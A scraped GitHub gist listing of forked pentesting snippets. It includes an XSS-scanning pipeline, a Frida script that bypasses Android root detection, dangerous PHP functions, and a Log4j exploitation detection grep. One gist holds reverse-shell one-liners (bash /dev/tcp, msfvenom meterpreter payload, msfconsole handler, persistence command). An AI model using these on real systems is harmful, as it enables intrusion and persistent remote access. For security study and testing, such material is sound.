https://github.com/arkadiyt/bounty-targets-data
http://www.asnlookup.com/
Never Mind secfb
secfb
/ xss_one_liner.md
Created
October 25, 2022 10:30
— forked from cihanmehmet/xss_one_liner.md
xss_one_liner.md
#cat targets_urls.txt
http://public-firing-range.appspot.comgospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| LIMIT=500 #number of cycles | |
| for ((i=1; i <= LIMIT ; i++)) do | |
| find . -name '*.rar' -exec unrar e {} \; -exec rm {} \; #rar file | |
| #find . -name '*.7z' -exec 7za e {} \; -exec rm {} \; # 7z file | |
| #find . -name '*.zip' -exec unzip {} \; -exec rm {} \; #zip file | |
| done | |
| #recursive file rar,zip,7z you can open the files with this script. | |
| #Матрёшка,Matryoshka CTF |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| python -c 'import pty; pty.spawn("/bin/sh")' | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.151 LPORT=1515 -e x86/shikata_ga_nai -b "0" -f exe cmd.exe | |
| msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 172.16.154.1; set LPORT 1111; run" | |
| run persistence -A -i 10 -p 6767 -r 192.168.0.24 |
secfb
/ BurpSuiteSSLPassTrough.json
Created
November 6, 2022 20:45
— forked from vsec7/BurpSuiteSSLPassTrough.json
Filter out the noise
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "proxy":{ | |
| "ssl_pass_through":{ | |
| "automatically_add_entries_on_client_ssl_negotiation_failure":false, | |
| "rules":[ | |
| { | |
| "enabled":true, | |
| "host":".*\\.google\\.com", | |
| "protocol":"any" | |
| }, |
secfb
/ grep_ip.txt
Created
October 25, 2022 10:32
— forked from cihanmehmet/grep_ip.txt
grep_ip.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GREP NOT IP RESULT | |
| cat file.txt| grep -Eov "\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" | |
| grep -Eov "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" some_ip.txt | |
| egrep -v '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}' file.txt | |
| grep -v "[[:alpha:]]" some_url-ip.txt |egrep -v '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}' | |
| grep -Eov "^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$" d.txt |
secfb
/ root_bypass.js
Created
February 23, 2022 08:45
— forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // $ frida -l antiroot.js -U -f com.example.app --no-pause | |
| // CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh): | |
| // - I added extra whitelisted items to deal with the latest versions | |
| // of RootBeer/Cordova iRoot as of August 6, 2019 | |
| // - The original one just fucked up (kill itself) if Magisk is installed lol | |
| // Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
| // If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
| Java.perform(function() { | |
| var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
secfb
/ phpdangerousfuncs.md
Created
January 13, 2022 08:28
— forked from mccabe615/phpdangerousfuncs.md
Dangerous PHP Functions
exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
secfb
/ log4j_rce_detection.md
Created
December 24, 2021 07:17
— forked from Neo23x0/log4j_rce_detection.md
Log4j RCE CVE-2021-44228 Exploitation Detection
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/logNewerOlder